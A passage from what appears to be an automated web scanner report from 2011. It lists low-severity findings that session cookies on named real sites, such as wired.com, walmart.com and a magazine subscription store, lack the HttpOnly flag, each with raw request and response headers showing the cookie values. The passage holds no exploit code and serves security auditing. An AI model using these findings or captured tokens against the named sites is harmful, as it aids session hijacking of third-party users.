Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Self

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Self HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:03 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Dft1_pxBjhT64qTXywTQT1R:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:54 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAE%0aGONswVFm2hpNJHAn604U%2ftoCUUE1BDFuNTRos3CBUAShEK4IkYeQeHazq%2bozYow%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420087%3atrue%3afalse%3a0%3amBXTv1vHzAp04ze95g3yWJHphRs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29719


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.20. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_TeenVogue

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_TeenVogue HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000G-x9BjqxoEAPW6PZDfPnvF5:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:06 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fBH%0aLqxAiny5LrVz%2bboJL8AQ0naDA20QdjfAXxC134f7Jz1m3YvhRQzvjNwXQt%2f68io%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420099%3atrue%3afalse%3a0%3aYqj2GK49LEs6noC6BEQI39oGsjk%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29857


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.21. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_VanityFair

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_VanityFair HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:01 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000xw9XDCR-rSohWzeYpltKY-H:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:52 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDL%0aRtcOX7vAUdLq6Hq4AWZJug3ter6Ve1vDGMgmhvF0ReSmeomwIBRyvlOp7VmTrkc%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420151%3atrue%3afalse%3a0%3azcJlgswaOZvisfczfqgW4YNNQxo%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29925


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.22. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Vogue

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Vogue HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:20 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=000077AvQ5emcOSox5imPZuSXqf:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:00 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAM%0a7ZiVQobgmG6AiURqTuhruWAd40Qhy2PGdMvGtTU6F1PZxSPdsjjJkMU9jkcblHU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420159%3atrue%3afalse%3a0%3ac4wFYold1FoX5flDzeXNYHnayJw%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29758


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.23. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_W

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_W HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Vhby-bpIpWQ2UcIyMe80vlp:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:17 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a9%0a20%2fejh7prtVltEMryh1brZCRsLLaPkaMe8Akhmqi39JY7u9vjrKp02H5AlUQE7E%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419835%3atrue%3afalse%3a0%3aCFEfewzTmdxWTKG7j05ZJskj1Zs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29935


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.24. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Wired

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Wired HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:36 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000kzU6rJKyKppPAMaRGuijmYh:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:17 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDt%0aoJJmfmiKMqLpgwDfHCXGni13qTu0LfcLGqCDRlYqKtYD3XcqH1hYJGauy1R%2fYxU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420176%3atrue%3afalse%3a0%3a5KRoPYNZ6oweqAaKlufu18E0nIQ%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29856


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.25. http://www.sentinelinvestments.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sentinelinvestments.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sentinelinvestments.com

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 14:07:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
   <l
...[SNIP]...

11.26. http://www.tukui.org/v2/forums/register.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tukui.org
Path:   /v2/forums/register.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v2/forums/register.php HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:59:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=rnddj5jg2uaifkgegn80melko7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6325
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...

11.27. http://www.walmart.com/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.walmart.com
Path:   /x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: max-age=0
Last-Modified: Wed, 12 Jan 2011 15:26:32 GMT
Expires: Wed, 12 Jan 2011 15:26:32 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 15:26:33 GMT
Content-Length: 11881
Connection: close
Set-Cookie: cef.env=PROD; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.visitor=12724351807; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.anoncart=127243518071209880; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.anoncart:127243518071209880|:|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: WMSessionID=00000005b4cc9e333fe1fb52cda733673fedc1581bb3a0ce_1294845992827_SSL203_10-15-97-102_1294845992827_10.95_N_; Domain=.walmart.com; Path=/
Set-Cookie: cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1294845992829@firstcreate:1294845992829"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff090726f145525d5f4f58455e445a4a423660;path=/
Set-Cookie: dcenv=ndc; path=/; domain=walmart.com
Via: HTTP/1.1 nw307 (nw307_7330869248_73610240)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title> - Walmart</title>
<link href="http://i2.walmartimages.com/css/global.css"
...[SNIP]...

11.28. http://www.wired.com/services/corrections/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/corrections/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/corrections/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=acbAOmv50QXE_5DZY461s; path=/
Content-Length: 54310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

11.29. http://www.wired.com/services/newsletters  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/newsletters

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/newsletters HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:04 GMT
Content-Length: 31938
Connection: close
Set-Cookie: JSESSIONID=acbKlmpgDx9HsdHJY461s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

11.30. http://www.wired.com/user/login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/login HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/login
Content-Length: 73
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:42 GMT
Connection: close
Set-Cookie: JSESSIONID=abcOkB-090FYf89-iN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/login">here</a>

11.31. http://www.wired.com/user/logout  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/logout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/logout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/logout
Content-Length: 74
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:46 GMT
Connection: close
Set-Cookie: JSESSIONID=cabyqTOw1aWnFbl3jN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/logout">here</a>

11.32. http://www.wired.com/user/registration  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/registration

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/registration HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/registration
Content-Length: 80
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=abcPb5WLVvrzQ952mN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/registration">here</a>

11.33. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.crwdcntrl.net
Path:   /4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

